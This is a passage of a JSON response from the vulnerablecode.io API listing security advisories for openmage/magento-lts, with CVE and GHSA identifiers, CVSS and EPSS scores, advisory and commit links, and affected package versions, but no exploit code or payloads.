"", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-r3c9-9j5q-pwv4" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-r3c9-9j5q-pwv4", "reference_id": "GHSA-r3c9-9j5q-pwv4", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N" }, { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-10T21:01:23Z/" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-r3c9-9j5q-pwv4" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/63720?format=api", "purl": "pkg:composer/openmage/magento-lts@20.0.19", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": "VCID-9axm-6vqd-tkag" }, { "vulnerability": "VCID-9ztp-ffqs-4yh4" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-dg5g-wnuf-ryad" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-h9n9-9mxj-zqd6" }, { "vulnerability": "VCID-jfan-uqf5-3qhd" }, { "vulnerability": "VCID-mdd4-wk6v-a3cw" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.0.19" } ], "aliases": [ "CVE-2021-21395", "GHSA-r3c9-9j5q-pwv4", "GMS-2023-158" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-g75g-ab3s-y7db" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/44323?format=api", "vulnerability_id": "VCID-gewj-4tzh-k3e5", "summary": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in openmage/magento-lts.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-41143", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.01224", "scoring_system": "epss", "scoring_elements": "0.7948", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.01224", "scoring_system": "epss", "scoring_elements": "0.79467", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.01224", "scoring_system": "epss", "scoring_elements": "0.79478", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.01224", "scoring_system": "epss", "scoring_elements": "0.79452", "published_at": "2026-06-04T12:55:00Z" }, { "value": "0.01224", "scoring_system": "epss", "scoring_elements": "0.79485", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-41143" }, { "reference_url": "https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://github.com/OpenMage/magento-lts/commit/45330ff50439984e806992fa22c3f96c4d660f91", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-03-10T20:58:21Z/" } ], "url": "https://github.com/OpenMage/magento-lts/commit/45330ff50439984e806992fa22c3f96c4d660f91" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v19.4.22", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-03-10T20:58:21Z/" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v19.4.22" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.0.19", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-03-10T20:58:21Z/" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.0.19" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41143", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41143" }, { "reference_url": "https://github.com/advisories/GHSA-5vpv-xmcj-9q85", "reference_id": "GHSA-5vpv-xmcj-9q85", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-5vpv-xmcj-9q85" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-5vpv-xmcj-9q85", "reference_id": "GHSA-5vpv-xmcj-9q85", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-03-10T20:58:21Z/" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-5vpv-xmcj-9q85" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/63720?format=api", "purl": "pkg:composer/openmage/magento-lts@20.0.19", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": "VCID-9axm-6vqd-tkag" }, { "vulnerability": "VCID-9ztp-ffqs-4yh4" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-dg5g-wnuf-ryad" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-h9n9-9mxj-zqd6" }, { "vulnerability": "VCID-jfan-uqf5-3qhd" }, { "vulnerability": "VCID-mdd4-wk6v-a3cw" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.0.19" } ], "aliases": [ "CVE-2021-41143", "GHSA-5vpv-xmcj-9q85", "GMS-2023-155" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-gewj-4tzh-k3e5" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/44329?format=api", "vulnerability_id": "VCID-gn12-464m-fkcu", "summary": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in openmage/magento-lts.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-39217", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00724", "scoring_system": "epss", "scoring_elements": "0.72961", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00724", "scoring_system": "epss", "scoring_elements": "0.72978", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00724", "scoring_system": "epss", "scoring_elements": "0.7297", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00724", "scoring_system": "epss", "scoring_elements": "0.72947", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00724", "scoring_system": "epss", "scoring_elements": "0.72933", "published_at": "2026-06-04T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-39217" }, { "reference_url": "https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://github.com/OpenMage/magento-lts/commit/289bd4b4f53622138e3e5c2d2cef7502d780086f", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-03-10T20:58:24Z/" } ], "url": "https://github.com/OpenMage/magento-lts/commit/289bd4b4f53622138e3e5c2d2cef7502d780086f" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v19.4.22", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-03-10T20:58:24Z/" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v19.4.22" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.0.19", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-03-10T20:58:24Z/" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.0.19" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39217", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39217" }, { "reference_url": "https://github.com/advisories/GHSA-c9q3-r4rv-mjm7", "reference_id": "GHSA-c9q3-r4rv-mjm7", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-c9q3-r4rv-mjm7" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-c9q3-r4rv-mjm7", "reference_id": "GHSA-c9q3-r4rv-mjm7", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-03-10T20:58:24Z/" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-c9q3-r4rv-mjm7" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/63720?format=api", "purl": "pkg:composer/openmage/magento-lts@20.0.19", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": "VCID-9axm-6vqd-tkag" }, { "vulnerability": "VCID-9ztp-ffqs-4yh4" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-dg5g-wnuf-ryad" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-h9n9-9mxj-zqd6" }, { "vulnerability": "VCID-jfan-uqf5-3qhd" }, { "vulnerability": "VCID-mdd4-wk6v-a3cw" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.0.19" } ], "aliases": [ "CVE-2021-39217", "GHSA-c9q3-r4rv-mjm7", "GMS-2023-156" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-gn12-464m-fkcu" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/45995?format=api", "vulnerability_id": "VCID-h9n9-9mxj-zqd6", "summary": "Improper Neutralization in openmage/magento-lts.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-41879", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00102", "scoring_system": "epss", "scoring_elements": "0.27707", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00128", "scoring_system": "epss", "scoring_elements": "0.31696", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00128", "scoring_system": "epss", "scoring_elements": "0.31729", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00128", "scoring_system": "epss", "scoring_elements": "0.31767", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-41879" }, { "reference_url": "https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://github.com/OpenMage/magento-lts/commit/2a2a2fb504247e8966f8ffc2e17d614be5d43128", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-09-26T16:53:59Z/" } ], "url": "https://github.com/OpenMage/magento-lts/commit/2a2a2fb504247e8966f8ffc2e17d614be5d43128" }, { "reference_url": "https://github.com/OpenMage/magento-lts/commit/31e74ac5d670b10001f88f038046b62367f15877", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-09-26T16:53:59Z/" } ], "url": "https://github.com/OpenMage/magento-lts/commit/31e74ac5d670b10001f88f038046b62367f15877" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v19.5.1", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-09-26T16:53:59Z/" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v19.5.1" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.1.1", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-09-26T16:53:59Z/" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.1.1" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41879", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41879" }, { "reference_url": "https://github.com/advisories/GHSA-9358-cpvx-c2qp", "reference_id": "GHSA-9358-cpvx-c2qp", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-9358-cpvx-c2qp" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-9358-cpvx-c2qp", "reference_id": "GHSA-9358-cpvx-c2qp", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-09-26T16:53:59Z/" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-9358-cpvx-c2qp" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/66839?format=api", "purl": "pkg:composer/openmage/magento-lts@20.1.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": "VCID-9axm-6vqd-tkag" }, { "vulnerability": "VCID-9ztp-ffqs-4yh4" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-dg5g-wnuf-ryad" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-jfan-uqf5-3qhd" }, { "vulnerability": "VCID-mdd4-wk6v-a3cw" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.1.1" } ], "aliases": [ "CVE-2023-41879", "GHSA-9358-cpvx-c2qp" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-h9n9-9mxj-zqd6" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/46590?format=api", "vulnerability_id": "VCID-jfan-uqf5-3qhd", "summary": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in openmage/magento-lts.", "references": [ { "reference_url": "https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://github.com/OpenMage/magento-lts/pull/3220", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/pull/3220" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.2.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.2.0" }, { "reference_url": "https://hackerone.com/reports/1948040", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://hackerone.com/reports/1948040" }, { "reference_url": "https://github.com/advisories/GHSA-9j5w-2cqc-cwj9", "reference_id": "GHSA-9j5w-2cqc-cwj9", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-9j5w-2cqc-cwj9" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-9j5w-2cqc-cwj9", "reference_id": "GHSA-9j5w-2cqc-cwj9", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-9j5w-2cqc-cwj9" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/68090?format=api", "purl": "pkg:composer/openmage/magento-lts@20.2.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": "VCID-9axm-6vqd-tkag" }, { "vulnerability": "VCID-9ztp-ffqs-4yh4" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-dg5g-wnuf-ryad" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-mdd4-wk6v-a3cw" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.2.0" } ], "aliases": [ "GHSA-9j5w-2cqc-cwj9", "GMS-2023-5656" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jfan-uqf5-3qhd" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/41370?format=api", "vulnerability_id": "VCID-jr6u-gjtr-3udv", "summary": "XPath Injection\nAdmin users can execute arbitrary commands via block methods.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-32758", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0036", "scoring_system": "epss", "scoring_elements": "0.58503", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.0036", "scoring_system": "epss", "scoring_elements": "0.58469", "published_at": "2026-06-04T12:55:00Z" }, { "value": "0.0036", "scoring_system": "epss", "scoring_elements": "0.58516", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.0036", "scoring_system": "epss", "scoring_elements": "0.58525", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.0036", "scoring_system": "epss", "scoring_elements": "0.58517", "published_at": "2026-06-07T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-32758" }, { "reference_url": "https://github.com/OpenMage/magento-lts/commit/b99307d00b59c4a226a1e3e4083f02cf2fc8fce7", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/commit/b99307d00b59c4a226a1e3e4083f02cf2fc8fce7" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v19.4.15", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v19.4.15" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.0.13", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.0.13" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-26rr-v2j2-25fh", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-26rr-v2j2-25fh" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32758", "reference_id": "CVE-2021-32758", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32758" }, { "reference_url": "https://github.com/advisories/GHSA-26rr-v2j2-25fh", "reference_id": "GHSA-26rr-v2j2-25fh", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-26rr-v2j2-25fh" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/58812?format=api", "purl": "pkg:composer/openmage/magento-lts@20.0.11", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-4tsg-n4v2-vyhg" }, { "vulnerability": "VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": "VCID-9axm-6vqd-tkag" }, { "vulnerability": "VCID-9ztp-ffqs-4yh4" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-dg5g-wnuf-ryad" }, { "vulnerability": "VCID-dj3k-4q1f-xfbh" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-g75g-ab3s-y7db" }, { "vulnerability": "VCID-gewj-4tzh-k3e5" }, { "vulnerability": "VCID-gn12-464m-fkcu" }, { "vulnerability": "VCID-h9n9-9mxj-zqd6" }, { "vulnerability": "VCID-jfan-uqf5-3qhd" }, { "vulnerability": "VCID-kctp-3z8m-5fg2" }, { "vulnerability": "VCID-mdd4-wk6v-a3cw" }, { "vulnerability": "VCID-tqce-uume-myc2" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.0.11" }, { "url": "http://public2.vulnerablecode.io/api/packages/58829?format=api", "purl": "pkg:composer/openmage/magento-lts@20.0.13", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-4tsg-n4v2-vyhg" }, { "vulnerability": "VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": 